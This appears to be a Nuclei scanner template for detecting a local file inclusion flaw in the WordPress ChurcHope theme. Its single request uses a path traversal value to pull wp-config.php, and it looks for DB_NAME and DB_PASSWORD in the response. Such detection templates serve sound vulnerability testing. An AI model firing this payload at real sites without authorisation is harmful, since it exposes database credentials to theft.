id: churchope-lfi info: name: WordPress ChurcHope Theme <= 2.1 - Local File Inclusion author: dhiyaneshDK severity: high description: WordPress ChurcHope Theme <= 2.1 is susceptible to local file inclusion. The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible. reference: - https://wpscan.com/vulnerability/3c5833bd-1fe0-4eba-97aa-7d3a0c8fda15 classification: cwe-id: CWE-22 tags: wp,wpscan,wordpress,wp-theme,lfi metadata: max-request: 1 http: - method: GET path: - '{{BaseURL}}/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php' matchers-condition: and matchers: - type: word part: body words: - "DB_NAME" - "DB_PASSWORD" condition: and - type: status status: - 200